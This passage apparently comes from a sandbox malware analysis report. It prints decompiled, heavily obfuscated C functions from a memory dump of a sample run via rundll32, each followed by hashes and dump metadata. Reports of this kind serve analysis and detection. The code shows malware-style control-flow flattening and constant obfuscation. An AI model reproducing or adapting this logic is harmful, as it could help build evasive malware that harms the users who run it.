                                                                                                                      											_t201 = _t172 - 0xfec6e86;
                                                                                                                      											if(_t172 != 0xfec6e86) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												E0035F88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 |  *_t189 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					 *(_t189 + 4) = E0035542E(_t188);
                                                                                                                      					_t172 = 0x2f8759c;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t172 - 0x1551776;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L9;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 4b5c24ddb1c9c3de0fd7289f9dd6f0773dc68bcaf8430ba2e0086b325635bebc
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: A68123B10083419FC36ACF65C98A81BFBF1FBC5748F509A1DF59A46260D7B19A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0035C9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t168;
                                                                                                                      				void* _t171;
                                                                                                                      				signed int _t188;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				void* _t192;
                                                                                                                      				signed int* _t195;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t147);
                                                                                                                      				_v60 = 0x2183dd;
                                                                                                                      				_t195 =  &(( &_v64)[6]);
                                                                                                                      				_v60 = _v60 << 0xc;
                                                                                                                      				_v60 = _v60 << 0xf;
                                                                                                                      				_t192 = 0;
                                                                                                                      				_t171 = 0xa488efe;
                                                                                                                      				_t188 = 0x78;
                                                                                                                      				_v60 = _v60 * 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x10000001;
                                                                                                                      				_v44 = 0xe22f1a;
                                                                                                                      				_v44 = _v44 + 0xffffab53;
                                                                                                                      				_v44 = _v44 / _t188;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x00003c3b;
                                                                                                                      				_v36 = 0x9a4ce6;
                                                                                                                      				_v36 = _v36 + 0xffffe16e;
                                                                                                                      				_v36 = _v36 | 0x72a3b0b5;
                                                                                                                      				_v36 = _v36 ^ 0x32bbbef5;
                                                                                                                      				_v28 = 0xd892e4;
                                                                                                                      				_v28 = _v28 | 0x189bde37;
                                                                                                                      				_v28 = _v28 ^ 0x998d043c;
                                                                                                                      				_v28 = _v28 ^ 0xc156dacb;
                                                                                                                      				_v20 = 0xff0234;
                                                                                                                      				_v20 = _v20 + 0xffffad5b;
                                                                                                                      				_v20 = _v20 ^ 0x00f1fad0;
                                                                                                                      				_v40 = 0xdc05b;
                                                                                                                      				_v40 = _v40 ^ 0xb55e20f9;
                                                                                                                      				_t189 = 3;
                                                                                                                      				_v40 = _v40 / _t189;
                                                                                                                      				_v40 = _v40 ^ 0x3c7a3b1c;
                                                                                                                      				_v64 = 0x518ad0;
                                                                                                                      				_v64 = _v64 ^ 0x6bfb13ad;
                                                                                                                      				_v64 = _v64 << 2;
                                                                                                                      				_t190 = 0x6a;
                                                                                                                      				_v64 = _v64 * 7;
                                                                                                                      				_v64 = _v64 ^ 0xc6a3f60b;
                                                                                                                      				_v24 = 0x25f852;
                                                                                                                      				_v24 = _v24 + 0xffff91c6;
                                                                                                                      				_v24 = _v24 ^ 0x002d038f;
                                                                                                                      				_v32 = 0x681d6c;
                                                                                                                      				_v32 = _v32 ^ 0x9f49642f;
                                                                                                                      				_v32 = _v32 * 0x3a;
                                                                                                                      				_v32 = _v32 ^ 0x0d93f477;
                                                                                                                      				_v56 = 0xa4373;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 << 0xb;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 ^ 0x521bad52;
                                                                                                                      				_v16 = 0x3abafe;
                                                                                                                      				_v16 = _v16 | 0x2531d7a0;
                                                                                                                      				_v16 = _v16 ^ 0x25301684;
                                                                                                                      				_v48 = 0x8b99e8;
                                                                                                                      				_v48 = _v48 ^ 0x8a9a3b2d;
                                                                                                                      				_v48 = _v48 * 0x56;
                                                                                                                      				_v48 = _v48 / _t190;
                                                                                                                      				_v48 = _v48 ^ 0x00e0af40;
                                                                                                                      				_v8 = 0xf2305e;
                                                                                                                      				_v8 = _v8 | 0x3a3bb36f;
                                                                                                                      				_v8 = _v8 ^ 0x3af325a3;
                                                                                                                      				_v52 = 0xa4558c;
                                                                                                                      				_v52 = _v52 >> 0xe;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xad08;
                                                                                                                      				_v52 = _v52 ^ 0x0057bd84;
                                                                                                                      				_v12 = 0xb8a572;
                                                                                                                      				_v12 = _v12 | 0x00b7603c;
                                                                                                                      				_v12 = _v12 ^ 0x00ba29b3;
                                                                                                                      				while(_t171 != 0x263a30c) {
                                                                                                                      					if(_t171 == 0x50e379a) {
                                                                                                                      						_push(_t171);
                                                                                                                      						_push(_t171);
                                                                                                                      						_t192 = E00353512(_v4 + _v4);
                                                                                                                      						if(_t192 != 0) {
                                                                                                                      							_t171 = 0x263a30c;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t171 == 0xa488efe) {
                                                                                                                      							_t171 = 0xdc1694f;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t171 != 0xdc1694f) {
                                                                                                                      								L11:
                                                                                                                      								if(_t171 != 0xa17b831) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t168 = E0035D2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
                                                                                                                      								_t195 =  &(_t195[7]);
                                                                                                                      								if(_t168 != 0) {
                                                                                                                      									_t171 = 0x50e379a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t192;
                                                                                                                      				}
                                                                                                                      				E0035D2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
                                                                                                                      				_t195 =  &(_t195[7]);
                                                                                                                      				_t171 = 0xa17b831;
                                                                                                                      				goto L11;
                                                                                                                      			}





























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: a48bc2dc7e3008a3cc1b557da6c906dde0c46aa2ad36ce6a98e335b39238a8fa
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: C27132721083819FC355CF25C48A81FBBF2FBC4758F505A1DF99686220C372DA49CB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0034777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				unsigned int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t149;
                                                                                                                      				signed int _t152;
                                                                                                                      				signed int _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				signed int _t155;
                                                                                                                      				void* _t158;
                                                                                                                      				signed int* _t179;
                                                                                                                      				void* _t181;
                                                                                                                      				void* _t182;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t178 = _a4;
                                                                                                                      				_t179 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t128);
                                                                                                                      				_v104 = 0x8623b;
                                                                                                                      				_t182 = _t181 + 0x18;
                                                                                                                      				_v104 = _v104 + 0xffff31eb;
                                                                                                                      				_v104 = _v104 | 0x66daf122;
                                                                                                                      				_t158 = 0xd040992;
                                                                                                                      				_t152 = 0x22;
                                                                                                                      				_v104 = _v104 / _t152;
                                                                                                                      				_v104 = _v104 ^ 0x03069644;
                                                                                                                      				_v100 = 0x2bbbe;
                                                                                                                      				_t153 = 0x14;
                                                                                                                      				_v100 = _v100 * 0xf;
                                                                                                                      				_v100 = _v100 / _t153;
                                                                                                                      				_v100 = _v100 | 0x351d3417;
                                                                                                                      				_v100 = _v100 ^ 0x351dc123;
                                                                                                                      				_v72 = 0xab81ef;
                                                                                                                      				_v72 = _v72 >> 0xd;
                                                                                                                      				_v72 = _v72 ^ 0x000a49b6;
                                                                                                                      				_v76 = 0x16a933;
                                                                                                                      				_v76 = _v76 ^ 0xe7c1b086;
                                                                                                                      				_v76 = _v76 ^ 0xe7d23b20;
                                                                                                                      				_v60 = 0x52cbe;
                                                                                                                      				_t154 = 0x2d;
                                                                                                                      				_v60 = _v60 * 0x6f;
                                                                                                                      				_v60 = _v60 ^ 0x023eaa51;
                                                                                                                      				_v84 = 0x759948;
                                                                                                                      				_v84 = _v84 + 0x9b78;
                                                                                                                      				_v84 = _v84 ^ 0xc5583688;
                                                                                                                      				_v84 = _v84 ^ 0xc523a4cd;
                                                                                                                      				_v88 = 0xf8b174;
                                                                                                                      				_v88 = _v88 << 0xa;
                                                                                                                      				_v88 = _v88 | 0xb04365c9;
                                                                                                                      				_v88 = _v88 ^ 0xf2c73fc1;
                                                                                                                      				_v64 = 0x1cff55;
                                                                                                                      				_v64 = _v64 / _t154;
                                                                                                                      				_v64 = _v64 ^ 0x000b3edd;
                                                                                                                      				_v68 = 0x9a9e72;
                                                                                                                      				_v68 = _v68 + 0xffffcb3f;
                                                                                                                      				_v68 = _v68 ^ 0x009b4266;
                                                                                                                      				_v92 = 0x7b2ebb;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xf233ff82;
                                                                                                                      				_v92 = _v92 ^ 0x2b4dc82a;
                                                                                                                      				_v96 = 0x6d21c4;
                                                                                                                      				_v96 = _v96 ^ 0x8acf53c4;
                                                                                                                      				_v96 = _v96 + 0xffff3a52;
                                                                                                                      				_v96 = _v96 | 0xe5741bb4;
                                                                                                                      				_v96 = _v96 ^ 0xeff12f72;
                                                                                                                      				_v56 = 0x5c5116;
                                                                                                                      				_v56 = _v56 + 0xffff598a;
                                                                                                                      				_v56 = _v56 ^ 0x00573a27;
                                                                                                                      				_v80 = 0xae67f2;
                                                                                                                      				_v80 = _v80 + 0x56e4;
                                                                                                                      				_t155 = 0x50;
                                                                                                                      				_v80 = _v80 / _t155;
                                                                                                                      				_v80 = _v80 ^ 0x0002e359;
                                                                                                                      				do {
                                                                                                                      					while(_t158 != 0x253e674) {
                                                                                                                      						if(_t158 == 0x4f8855c) {
                                                                                                                      							E0035F88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
                                                                                                                      						} else {
                                                                                                                      							if(_t158 == 0x5caea7a) {
                                                                                                                      								E00354D91( *_t178,  &_v52, _v68, _v92);
                                                                                                                      								_t182 = _t182 + 8;
                                                                                                                      								_t158 = 0x4f8855c;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t158 == 0x9ad54af) {
                                                                                                                      									_push(_t158);
                                                                                                                      									_push(_t158);
                                                                                                                      									_t149 = E00353512(_t179[1]);
                                                                                                                      									 *_t179 = _t149;
                                                                                                                      									__eflags = _t149;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t158 = 0x253e674;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t158 == 0xa436207) {
                                                                                                                      										_t179[1] = E0035109E(_t178);
                                                                                                                      										_t158 = 0x9ad54af;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t158 != 0xd040992) {
                                                                                                                      											goto L13;
                                                                                                                      										} else {
                                                                                                                      											_t158 = 0xa436207;
                                                                                                                      											 *_t179 =  *_t179 & 0x00000000;
                                                                                                                      											_t179[1] = _v104;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L16:
                                                                                                                      						__eflags =  *_t179;
                                                                                                                      						_t127 =  *_t179 != 0;
                                                                                                                      						__eflags = _t127;
                                                                                                                      						return 0 | _t127;
                                                                                                                      					}
                                                                                                                      					E003564C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
                                                                                                                      					_t182 = _t182 + 0x10;
                                                                                                                      					_t158 = 0x5caea7a;
                                                                                                                      					L13:
                                                                                                                      					__eflags = _t158 - 0x12a0183;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L16;
                                                                                                                      			}




























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: a7f47199b6b194dccfab4317e949215f5bbcd476ae0b5571e46f06f7a6cf1809
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 7D6155B5109342AFC769CF21C48A91FBBF1FBC8358F50991CF5DA9A260D3759A098F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0035EBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				void* _t91;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				signed int _t111;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t116;
                                                                                                                      				void* _t131;
                                                                                                                      				void* _t132;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t131 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t91);
                                                                                                                      				_v28 = 0x7108be;
                                                                                                                      				_v28 = _v28 + 0x734d;
                                                                                                                      				_v28 = _v28 + 0xa8e4;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v28 = _v28 + 0xffff8493;
                                                                                                                      				_t114 = 0xcca5bf9;
                                                                                                                      				_v28 = _v28 ^ 0x0074778b;
                                                                                                                      				_v20 = 0xc2a60c;
                                                                                                                      				_v20 = _v20 >> 5;
                                                                                                                      				_v20 = _v20 ^ 0x558996ec;
                                                                                                                      				_v20 = _v20 ^ 0x55851de9;
                                                                                                                      				_v12 = 0x41ee29;
                                                                                                                      				_t21 =  &_v12; // 0x41ee29
                                                                                                                      				_t109 = 0x29;
                                                                                                                      				_v12 =  *_t21 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x09c82f39;
                                                                                                                      				_v32 = 0x1f5650;
                                                                                                                      				_v32 = _v32 >> 1;
                                                                                                                      				_v32 = _v32 / _t109;
                                                                                                                      				_v32 = _v32 ^ 0xe76a4887;
                                                                                                                      				_v32 = _v32 ^ 0xe76186a0;
                                                                                                                      				_v36 = 0x15f4a6;
                                                                                                                      				_v36 = _v36 | 0x84842460;
                                                                                                                      				_v36 = _v36 + 0x9b66;
                                                                                                                      				_t110 = 0x43;
                                                                                                                      				_v36 = _v36 / _t110;
                                                                                                                      				_v36 = _v36 ^ 0x01f36aaa;
                                                                                                                      				_v4 = 0xe58fa8;
                                                                                                                      				_v4 = _v4 >> 0xf;
                                                                                                                      				_v4 = _v4 ^ 0x0008ca28;
                                                                                                                      				_v8 = 0x294ac3;
                                                                                                                      				_v8 = _v8 + 0xffff78db;
                                                                                                                      				_v8 = _v8 ^ 0x0024bdda;
                                                                                                                      				_v16 = 0xcf6d8f;
                                                                                                                      				_v16 = _v16 >> 5;
                                                                                                                      				_v16 = _v16 + 0x1116;
                                                                                                                      				_v16 = _v16 ^ 0x000942b4;
                                                                                                                      				_v24 = 0xd07c42;
                                                                                                                      				_v24 = _v24 | 0x50b68ca9;
                                                                                                                      				_t111 = 0x74;
                                                                                                                      				_v24 = _v24 / _t111;
                                                                                                                      				_v24 = _v24 << 3;
                                                                                                                      				_v24 = _v24 ^ 0x05925fb7;
                                                                                                                      				while(_t114 != 0x2cca53b) {
                                                                                                                      					if(_t114 == 0x3850c59) {
                                                                                                                      						E003468DE(_v4, _v8, _v16, _v24,  *0x365214);
                                                                                                                      					} else {
                                                                                                                      						if(_t114 == 0xcca5bf9) {
                                                                                                                      							_push(_t114);
                                                                                                                      							_push(_t114);
                                                                                                                      							_t116 = 0x50;
                                                                                                                      							 *0x365214 = E00353512(_t116);
                                                                                                                      							_t114 = 0xd9a7a55;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t114 == 0xd96b1a6) {
                                                                                                                      								_t132 = E0035EE11(_t131, _v32, _v36, _a8);
                                                                                                                      								if(_t132 == 0) {
                                                                                                                      									_t114 = 0x2cca53b;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t114 != 0xd9a7a55) {
                                                                                                                      									L12:
                                                                                                                      									if(_t114 != 0xca68b5e) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(E00360D5B() != 0) {
                                                                                                                      										_t114 = 0xd96b1a6;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				E00346D80();
                                                                                                                      				_t114 = 0x3850c59;
                                                                                                                      				goto L12;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: bf2df44adc702e07f2bcf22b91734695c00a888ad4f976129d6493cef633cfc5
                                                                                                                      • Instruction ID: 27e8e0417e6cf8092bd9f11b63c29d0465864a4c732d1d85a9bc02e5b531c53b
                                                                                                                      • Opcode Fuzzy Hash: bf2df44adc702e07f2bcf22b91734695c00a888ad4f976129d6493cef633cfc5
                                                                                                                      • Instruction Fuzzy Hash: 7A5166725093019FC759CF25D88A81BBBF1FBC8758F018A1DF9959A260D371DA4A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00353D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t102;
                                                                                                                      				void* _t110;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t132;
                                                                                                                      				signed int _t133;
                                                                                                                      				signed int* _t136;
                                                                                                                      
                                                                                                                      				_t131 = _a8;
                                                                                                                      				_t117 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t102);
                                                                                                                      				_v64 = 0x9e44de;
                                                                                                                      				_t136 =  &(( &_v100)[4]);
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x000cb772;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v84 = 0x342048;
                                                                                                                      				_t119 = 0x9e632dd;
                                                                                                                      				_v84 = _v84 << 2;
                                                                                                                      				_t133 = 0x77;
                                                                                                                      				_v84 = _v84 / _t133;
                                                                                                                      				_v84 = _v84 ^ 0x00050c4a;
                                                                                                                      				_v68 = 0xcb0a16;
                                                                                                                      				_v68 = _v68 * 0x2c;
                                                                                                                      				_v68 = _v68 ^ 0x22ee5bf9;
                                                                                                                      				_v88 = 0x6d370;
                                                                                                                      				_v88 = _v88 << 2;
                                                                                                                      				_v88 = _v88 + 0xffff4ba7;
                                                                                                                      				_v88 = _v88 ^ 0x0017e1fc;
                                                                                                                      				_v96 = 0xa9311c;
                                                                                                                      				_v96 = _v96 + 0x677e;
                                                                                                                      				_v96 = _v96 << 6;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0x1536caa9;
                                                                                                                      				_v92 = 0x3ec146;
                                                                                                                      				_v92 = _v92 >> 1;
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_v92 = _v92 ^ 0x01fa5034;
                                                                                                                      				_v100 = 0xc8b468;
                                                                                                                      				_v100 = _v100 + 0xabff;
                                                                                                                      				_v100 = _v100 + 0x496c;
                                                                                                                      				_v100 = _v100 << 3;
                                                                                                                      				_v100 = _v100 ^ 0x064ce6e5;
                                                                                                                      				_v72 = 0x40c3e5;
                                                                                                                      				_v72 = _v72 + 0xe4b1;
                                                                                                                      				_v72 = _v72 ^ 0x00481562;
                                                                                                                      				_v76 = 0xf7b9fc;
                                                                                                                      				_v76 = _v76 ^ 0x04753abe;
                                                                                                                      				_v76 = _v76 >> 8;
                                                                                                                      				_v76 = _v76 ^ 0x00058483;
                                                                                                                      				_v56 = 0xab3e00;
                                                                                                                      				_v56 = _v56 * 0x42;
                                                                                                                      				_v56 = _v56 ^ 0x2c2f6e9b;
                                                                                                                      				_v80 = 0x8577d2;
                                                                                                                      				_v80 = _v80 | 0xb985653c;
                                                                                                                      				_v80 = _v80 << 0xe;
                                                                                                                      				_v80 = _v80 ^ 0x5dfa230b;
                                                                                                                      				_v60 = 0xdce2c4;
                                                                                                                      				_v60 = _v60 | 0x5395b845;
                                                                                                                      				_v60 = _v60 ^ 0x53d3ec0c;
                                                                                                                      				while(_t119 != 0x979dba8) {
                                                                                                                      					if(_t119 == 0x9e632dd) {
                                                                                                                      						_t119 = 0xa2b72cf;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t119 == 0xa2b72cf) {
                                                                                                                      							E003564C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
                                                                                                                      							_t136 =  &(_t136[4]);
                                                                                                                      							_t119 = 0xe5d0333;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t119 != 0xe5d0333) {
                                                                                                                      								L10:
                                                                                                                      								__eflags = _t119 - 0xfc63b9d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t115 = E0034B09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
                                                                                                                      								_t136 =  &(_t136[4]);
                                                                                                                      								if(_t115 != 0) {
                                                                                                                      									_t119 = 0x979dba8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				_t110 = E0035B9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
                                                                                                                      				_t136 =  &(_t136[4]);
                                                                                                                      				__eflags = _t110;
                                                                                                                      				_t132 = (_t110 != 0) ? 1 : _t132;
                                                                                                                      				_t119 = 0xfc63b9d;
                                                                                                                      				goto L10;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lI$~g
                                                                                                                      • API String ID: 0-567424089
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: ae7a43e1f327d8ffd48074209a6b5a9830ea0a1e88a1de84f34c8516e80b8672
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: 475135B25083419FC749CF25C88A81BBBF5FBD4788F504A1DF99696260C375CA09CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00346A1F(void* __ecx) {
                                                                                                                      				signed int _v8;
